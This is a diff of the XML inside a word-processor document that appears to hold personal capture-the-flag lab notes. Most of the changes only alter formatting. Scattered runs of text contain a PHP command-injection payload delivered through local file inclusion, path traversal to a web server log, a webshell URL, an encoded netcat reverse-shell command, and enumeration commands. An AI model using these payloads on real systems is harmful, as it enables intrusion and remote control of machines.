+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:u w:val="none"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -15822,7 +17660,18 @@
         <w:pStyle w:val="Normal"/>
         <w:spacing w:before="0" w:after="283"/>
         <w:jc w:val="center"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:rFonts w:ascii="Carlito" w:hAnsi="Carlito" w:eastAsia="Calibri" w:cs="FreeSans"/>
+          <w:b/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:u w:val="single"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -15863,7 +17712,7 @@
       <w:hyperlink r:id="rId48">
         <w:r>
           <w:rPr>
-            <w:rStyle w:val="InternetLink"/>
+            <w:rStyle w:val="ListLabel15"/>
             <w:rFonts w:eastAsia="Calibri" w:cs="FreeSans" w:ascii="Carlito" w:hAnsi="Carlito"/>
             <w:b w:val="false"/>
             <w:bCs w:val="false"/>
@@ -15894,7 +17743,7 @@
       <w:hyperlink r:id="rId49">
         <w:r>
           <w:rPr>
-            <w:rStyle w:val="InternetLink"/>
+            <w:rStyle w:val="ListLabel15"/>
             <w:rFonts w:eastAsia="Calibri" w:cs="FreeSans" w:ascii="Carlito" w:hAnsi="Carlito"/>
             <w:b w:val="false"/>
             <w:bCs w:val="false"/>
@@ -15928,7 +17777,18 @@
         <w:pStyle w:val="Normal"/>
         <w:spacing w:before="0" w:after="283"/>
         <w:jc w:val="left"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:rFonts w:ascii="Carlito" w:hAnsi="Carlito" w:eastAsia="Calibri" w:cs="FreeSans"/>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:u w:val="none"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -15948,7 +17808,9 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -15960,7 +17822,9 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -15972,7 +17836,9 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -15984,7 +17850,9 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -15996,7 +17864,9 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -16008,7 +17878,9 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -16020,7 +17892,9 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -16059,7 +17933,18 @@
         <w:pStyle w:val="Normal"/>
         <w:spacing w:before="0" w:after="283"/>
         <w:jc w:val="center"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:rFonts w:ascii="Carlito" w:hAnsi="Carlito" w:eastAsia="Calibri" w:cs="FreeSans"/>
+          <w:b/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:u w:val="single"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -16081,7 +17966,18 @@
         <w:pStyle w:val="Normal"/>
         <w:spacing w:before="0" w:after="283"/>
         <w:jc w:val="left"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:rFonts w:ascii="Carlito" w:hAnsi="Carlito" w:eastAsia="Calibri" w:cs="FreeSans"/>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:u w:val="none"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -16103,7 +17999,12 @@
         <w:pStyle w:val="Normal"/>
         <w:spacing w:before="0" w:after="283"/>
         <w:jc w:val="left"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:u w:val="none"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -16119,7 +18020,18 @@
         <w:pStyle w:val="Normal"/>
         <w:spacing w:before="0" w:after="283"/>
         <w:jc w:val="center"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:rFonts w:ascii="Carlito" w:hAnsi="Carlito" w:eastAsia="Calibri" w:cs="FreeSans"/>
+          <w:b/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:u w:val="single"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -16141,7 +18053,18 @@
         <w:pStyle w:val="Normal"/>
         <w:spacing w:before="0" w:after="283"/>
         <w:jc w:val="left"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:rFonts w:ascii="Carlito" w:hAnsi="Carlito" w:eastAsia="Calibri" w:cs="FreeSans"/>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:u w:val="none"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -16176,9 +18099,10 @@
       <w:hyperlink r:id="rId50">
         <w:r>
           <w:rPr>
-            <w:rStyle w:val="InternetLink"/>
+            <w:rStyle w:val="ListLabel16"/>
             <w:b w:val="false"/>
             <w:bCs w:val="false"/>
+            <w:color w:val="000080"/>
             <w:u w:val="none"/>
           </w:rPr>
           <w:t>http://192.168.130.178/thankyou.php?FUZZ=FUZ2Z</w:t>
@@ -16198,14 +18122,19 @@
         <w:pStyle w:val="Normal"/>
         <w:spacing w:before="0" w:after="283"/>
         <w:jc w:val="left"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
+        <w:rPr>
+          <w:b w:val="false"/>
           <w:b w:val="false"/>
           <w:bCs w:val="false"/>
           <w:u w:val="none"/>
         </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:u w:val="none"/>
+        </w:rPr>
         <w:t xml:space="preserve">we discovered this lfi </w:t>
       </w:r>
     </w:p>
@@ -16231,7 +18160,12 @@
         <w:pStyle w:val="Normal"/>
         <w:spacing w:before="0" w:after="283"/>
         <w:jc w:val="left"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:u w:val="none"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -16252,9 +18186,10 @@
       <w:hyperlink r:id="rId51">
         <w:r>
           <w:rPr>
-            <w:rStyle w:val="InternetLink"/>
+            <w:rStyle w:val="ListLabel16"/>
             <w:b w:val="false"/>
             <w:bCs w:val="false"/>
+            <w:color w:val="000080"/>
             <w:u w:val="none"/>
           </w:rPr>
           <w:t>http://192.168.130.179/thankyou.php?file=%3C?php%20system($_GET[%27cmd%27])%20?%3E</w:t>
@@ -16279,9 +18214,10 @@
       <w:hyperlink r:id="rId52">
         <w:r>
           <w:rPr>
-            <w:rStyle w:val="InternetLink"/>
+            <w:rStyle w:val="ListLabel16"/>
             <w:b w:val="false"/>
             <w:bCs w:val="false"/>
+            <w:color w:val="000080"/>
             <w:u w:val="none"/>
           </w:rPr>
           <w:t>http://192.168.130.179/thankyou.php?file=</w:t>
@@ -16342,8 +18278,10 @@
       <w:hyperlink r:id="rId53">
         <w:r>
           <w:rPr>
-            <w:rStyle w:val="InternetLink"/>
+            <w:rStyle w:val="ListLabel3"/>
+            <w:color w:val="000080"/>
             <w:highlight w:val="yellow"/>
+            <w:u w:val="single"/>
           </w:rPr>
           <w:t>http://192.168.130.179/thankyou.php</w:t>
         </w:r>
@@ -16363,9 +18301,10 @@
       <w:hyperlink r:id="rId54">
         <w:r>
           <w:rPr>
-            <w:rStyle w:val="InternetLink"/>
+            <w:rStyle w:val="ListLabel16"/>
             <w:b w:val="false"/>
             <w:bCs w:val="false"/>
+            <w:color w:val="000080"/>
             <w:u w:val="none"/>
           </w:rPr>
           <w:t>http://192.168.130.179/thankyou.php?file=../../../../../../../../../../../../../../var/log/nginx/access.log</w:t>
@@ -16466,9 +18405,10 @@
       <w:hyperlink r:id="rId55">
         <w:r>
           <w:rPr>
-            <w:rStyle w:val="InternetLink"/>
+            <w:rStyle w:val="ListLabel17"/>
             <w:b w:val="false"/>
             <w:bCs w:val="false"/>
+            <w:color w:val="000080"/>
             <w:highlight w:val="yellow"/>
             <w:u w:val="none"/>
           </w:rPr>
@@ -16547,7 +18487,18 @@
         <w:pStyle w:val="Normal"/>
         <w:spacing w:before="0" w:after="283"/>
         <w:jc w:val="center"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:rFonts w:ascii="Carlito" w:hAnsi="Carlito" w:eastAsia="Calibri" w:cs="FreeSans"/>
+          <w:b/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:u w:val="single"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -16626,7 +18577,18 @@
         <w:pStyle w:val="Normal"/>
         <w:spacing w:before="0" w:after="283"/>
         <w:jc w:val="center"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:rFonts w:ascii="Carlito" w:hAnsi="Carlito" w:eastAsia="Calibri" w:cs="FreeSans"/>
+          <w:b/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:u w:val="single"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -16648,13 +18610,12 @@
         <w:pStyle w:val="Normal"/>
         <w:spacing w:before="0" w:after="283"/>
         <w:jc w:val="left"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Calibri" w:cs="FreeSans" w:ascii="Carlito" w:hAnsi="Carlito"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Carlito" w:hAnsi="Carlito" w:eastAsia="Calibri" w:cs="FreeSans"/>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
           <w:i w:val="false"/>
           <w:iCs w:val="false"/>
           <w:color w:val="000000"/>
@@ -16664,15 +18625,6 @@
           <w:u w:val="none"/>
           <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
         </w:rPr>
-        <w:t>-when an enumeration on web server doesn’t reveal something, try the directory brute force with custom password found</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:spacing w:before="0" w:after="283"/>
-        <w:jc w:val="left"/>
-        <w:rPr/>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -16688,6 +18640,30 @@
           <w:u w:val="none"/>
           <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
         </w:rPr>
+        <w:t>-when an enumeration on web server doesn’t reveal something, try the directory brute force with custom password found</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:spacing w:before="0" w:after="283"/>
+        <w:jc w:val="left"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Calibri" w:cs="FreeSans" w:ascii="Carlito" w:hAnsi="Carlito"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:u w:val="none"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
         <w:t xml:space="preserve">-link to decode brainfuck cipher </w:t>
       </w:r>
       <w:r>
@@ -16713,7 +18689,21 @@
         <w:pStyle w:val="Normal"/>
         <w:spacing w:before="0" w:after="283"/>
         <w:jc w:val="left"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:rFonts w:ascii="Carlito" w:hAnsi="Carlito" w:eastAsia="Calibri" w:cs="FreeSans"/>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:u w:val="none"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -16831,7 +18821,18 @@
         <w:pStyle w:val="Normal"/>
         <w:spacing w:before="0" w:after="283"/>
         <w:jc w:val="center"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:rFonts w:ascii="Carlito" w:hAnsi="Carlito" w:eastAsia="Calibri" w:cs="FreeSans"/>
+          <w:b/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:u w:val="single"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -18092,7 +20093,8 @@
       <w:hyperlink r:id="rId58">
         <w:r>
           <w:rPr>
-            <w:rStyle w:val="SourceText"/>
+            <w:rStyle w:val="ListLabel6"/>
+            <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono" w:eastAsia="Liberation Mono" w:cs="Liberation Mono"/>
             <w:highlight w:val="yellow"/>
           </w:rPr>
           <w:t>http://192.168.130.199/imfadministrator/uploads/88a05ecd1b9e.gif?cmd=ls</w:t>
@@ -18207,7 +20209,8 @@
       <w:hyperlink r:id="rId59">
         <w:r>
           <w:rPr>
-            <w:rStyle w:val="SourceText"/>
+            <w:rStyle w:val="ListLabel18"/>
+            <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono" w:eastAsia="Liberation Mono" w:cs="Liberation Mono"/>
             <w:b w:val="false"/>
             <w:bCs w:val="false"/>
             <w:highlight w:val="yellow"/>
@@ -18445,10 +20448,12 @@
       <w:hyperlink r:id="rId60">
         <w:r>
           <w:rPr>
-            <w:rStyle w:val="InternetLink"/>
+            <w:rStyle w:val="ListLabel19"/>
             <w:b/>
             <w:bCs/>
+            <w:color w:val="000080"/>
             <w:highlight w:val="yellow"/>
+            <w:u w:val="single"/>
           </w:rPr>
           <w:t>'@192.168.130.200</w:t>
         </w:r>
@@ -18475,14 +20480,19 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
+        <w:rPr>
+          <w:b/>
           <w:b/>
           <w:bCs/>
           <w:highlight w:val="yellow"/>
         </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
         <w:t>hURL -U "nc 192.168.130.1 4444 -e /bin/bash"</w:t>
       </w:r>
     </w:p>
@@ -18507,7 +20517,12 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Normal"/>
-        <w:rPr/>
+        <w:rPr>
+          <w:b/>
+          <w:b/>
+          <w:bCs/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -18568,7 +20583,7 @@
       <w:hyperlink r:id="rId61">
         <w:r>
           <w:rPr>
-            <w:rStyle w:val="StrongEmphasis"/>
+            <w:rStyle w:val="ListLabel20"/>
             <w:b w:val="false"/>
             <w:bCs w:val="false"/>
             <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
@@ -18663,7 +20678,7 @@
       <w:hyperlink r:id="rId62">
         <w:r>
           <w:rPr>
-            <w:rStyle w:val="StrongEmphasis"/>
+            <w:rStyle w:val="ListLabel21"/>
             <w:b w:val="false"/>
             <w:bCs w:val="false"/>
             <w:highlight w:val="yellow"/>
@@ -19326,110 +21341,78 @@
         <w:pStyle w:val="Normal"/>
         <w:rPr>
           <w:rStyle w:val="StrongEmphasis"/>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="StrongEmphasis"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-        </w:rPr>
-        <w:t>-Sharepoint enumeration</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="StrongEmphasis"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-        </w:rPr>
-        <w:t>dirsearch -u http://10.10.10.59  -r -e html,asp,aspx,jsp,txt -f  -w /usr/share/seclists/Discovery/Web-Content/CMS/sharepoint.txt --plain-text-report=/tmp/report_sharepoint_dirbuster.txt</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:rStyle w:val="StrongEmphasis"/>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="StrongEmphasis"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-        </w:rPr>
-        <w:t>-Check result of smbmap after scanning, if access is denied, then try later with a valid user account.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:rStyle w:val="StrongEmphasis"/>
-          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif" w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-          <w:color w:val="auto"/>
-          <w:kern w:val="2"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="AR PL KaitiM GB" w:cs="FreeSans"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-          <w:color w:val="auto"/>
-          <w:kern w:val="2"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
+          <w:u w:val="double"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:u w:val="double"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="StrongEmphasis"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
+        <w:t xml:space="preserve">-Sharepoint enumeration​ </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="StrongEmphasis"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
+        <w:t xml:space="preserve">default page : </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="StrongEmphasis"/>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
+        <w:t>_layouts/viewlsts.aspx</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="StrongEmphasis"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> example</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:rStyle w:val="StrongEmphasis"/>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
           <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
         </w:rPr>
       </w:r>
@@ -19447,187 +21430,326 @@
           <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="StrongEmphasis"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-        </w:rPr>
-        <w:t>-Connexion to MSSQL database</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="StrongEmphasis"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-        </w:rPr>
-        <w:t>*DBeaver</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="StrongEmphasis"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-        </w:rPr>
-        <w:t>*</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="SourceText"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-        </w:rPr>
-        <w:t>sqsh -S 10.10.10.59 -U sa</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:rStyle w:val="StrongEmphasis"/>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:rStyle w:val="StrongEmphasis"/>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:spacing w:before="0" w:after="283"/>
-        <w:jc w:val="center"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="StrongEmphasis"/>
-          <w:rFonts w:eastAsia="Calibri" w:cs="FreeSans" w:ascii="Carlito" w:hAnsi="Carlito"/>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="000000"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:u w:val="single"/>
-          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-        </w:rPr>
-        <w:t>HacktheBox Brainfuck (Linux)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="StrongEmphasis"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-        </w:rPr>
-        <w:t xml:space="preserve">-When https is allow, check the DNS in sslscan and add them in the /etc/hosts file </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
